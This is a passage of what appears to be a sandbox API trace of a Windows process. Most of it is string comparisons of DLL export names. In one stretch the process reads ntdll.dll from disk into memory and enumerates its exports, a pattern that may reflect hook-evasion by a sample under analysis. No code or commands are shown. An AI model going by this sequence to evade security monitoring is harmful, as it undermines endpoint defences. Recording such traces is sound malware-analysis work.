(lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0246.023] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0246.023] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0246.024] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0246.193] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0246.193] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0246.193] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0246.193] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0246.193] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0246.193] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0246.193] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0246.193] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0246.193] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0246.193] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0246.193] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0246.193] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0246.194] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0246.194] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0246.195] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0246.195] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0246.195] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0246.195] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0246.195] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0246.195] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0246.195] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0246.196] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0246.196] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0246.196] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0246.196] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0246.196] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0246.219] GetProcessHeap () returned 0x4e0000 [0246.219] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x40e1040 | out: hHeap=0x4e0000) returned 1 [0246.226] GetProcessHeap () returned 0x4e0000 [0246.226] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f92e0 [0246.226] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0246.226] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0246.226] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0246.227] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0246.227] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0246.228] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0246.228] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0246.228] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0246.228] GetProcessHeap () returned 0x4e0000 [0246.228] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1bba48) returned 0x40e5040 [0246.337] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0246.337] ReadFile (in: hFile=0x140, lpBuffer=0x40e5040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40e5040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0246.471] CloseHandle (hObject=0x140) returned 1 [0246.471] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0246.471] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0246.471] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0246.471] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0246.471] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0246.471] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0246.471] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0246.471] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0246.471] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0246.471] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0246.471] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0246.471] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0246.471] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0246.471] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.472] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0246.472] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0246.472] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.472] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0246.473] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0246.473] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0246.473] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0246.473] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0246.473] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0246.474] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0246.474] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.474] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.474] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.474] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.474] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0246.474] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0246.474] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0246.474] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0246.474] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0246.474] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0246.474] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0246.474] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0246.474] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0246.474] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.474] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.474] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.474] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.474] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0246.475] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0246.475] lstrcmpA (lpString1="AlpcRundownCompletionList", 